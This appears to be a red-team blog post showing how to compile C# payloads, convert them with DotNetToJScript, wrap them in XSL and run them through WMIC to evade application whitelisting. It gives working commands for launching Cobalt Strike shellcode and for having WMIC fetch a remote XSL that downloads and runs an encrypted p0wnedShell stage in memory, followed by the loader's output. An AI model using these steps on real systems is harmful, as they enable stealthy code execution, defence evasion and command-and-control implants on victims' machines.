CSharp, DotNetToJScript, XSL
The technique has some notable attractions:
- AWL bypass
- Execute when Windows Script Host is blocked
- Utilise JScript (DotNetToJScript hotness)
- Load XSL locally or from a URL
- WMIC is proxy aware (and works over TLS)
I encourage you to read through Casey’s original post before proceeding here.
The goal of this post is to walk through how you can take your own C#, run it through DotNetToJScript, and throw the output into XSL format.
For this example we’re going to execute 32-bit shellcode for a Cobalt Strike HTTP listener, using Arno0x0x’s shellcodeLauncher as a template. The only thing we need to add is a constructor for the Program class.
Replace line 25 with your shellcode of choice.
Compile to DLL
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -unsafe -platform:x86 -target:library shellcode.cs
It’s probably good practice to test your payload every step of the way. So before compiling to a DLL, compile to an EXE and run it to make sure it works as expected.
Next, provide the DLL to DotNetToJScript. Remember to modify the entry class if you’re using a different namespace and class name.
DotNetToJScript.exe -c ShellCodeLauncher.Program -o C:\Tools\shellcode.js C:\Tools\shellcode.dll
You can test the
js file using
cscript but because we’re outputting to 32-bit, we need to use the one in
The final step is to wrap the
js in the tags required by XSL. We can use the squiblytwo PoC as a template.
Final result should look something like this.
Again, because it’s 32-bit, we need the
SysWOW64 wmic to execute.
C:\Windows\SysWOW64\wbem\WMIC.exe os get /format:"C:\Tools\shellcode.xsl"
p0wnedShell is a well-known PowerShell runspace post exploitation toolkit written in C#, that can run PowerShell commands and functions within a runspace environment without using powershell.exe. p0wnedLoader is probably less well know and is not maintained with the main p0wnedShell repo. It enables you to download an AES encrypted version of p0wnedShell, decrypt it, then run it from memory.
For the purposes of this post, we’ll just use the old p0wnedShell in the p0wnedLoader repo - of course, you can compile and encrypt your own version with
As before, modify p0wnedLoader to provide a constructor for DotNetToJScript, then repeat the same steps in Example 1 to compile
p0wnedLoader.cs to a DLL, run DotNetToJScript and put it in XSL format.
If we also host the XSL online, we can run the entire thing without touching disk.
C:\Windows\System32\wbem\WMIC.exe os get /format:"https://raw.githubusercontent.com/rasta-mouse/p0wnedLoader/master/p0wnedLoader.xsl"
___ ____ __ ___ / _ \_ _____ ___ ___/ / / ___ ___ ____/ /__ ____ / _ \/ // / |/|/ / _ \/ -_) _ / /__/ _ \/ _ `/ _ / -_) __/ / .__/\___/|__,__/_//_/\__/\_,_/____/\___/\_,_/\_,_/\__/_/ /_/ Loads an Online AES Encrypted version of p0wnedShell By Cn33liz 2016 [*] Please enter the p0wnedShell Stage2 URL > https://raw.githubusercontent.com/Cn33liz/p0wnedLoader/master/p0wnedShellx64.enc [*] One moment while getting our Stage2 payload.... -> Done [*] Now please enter our Decryption Password > **********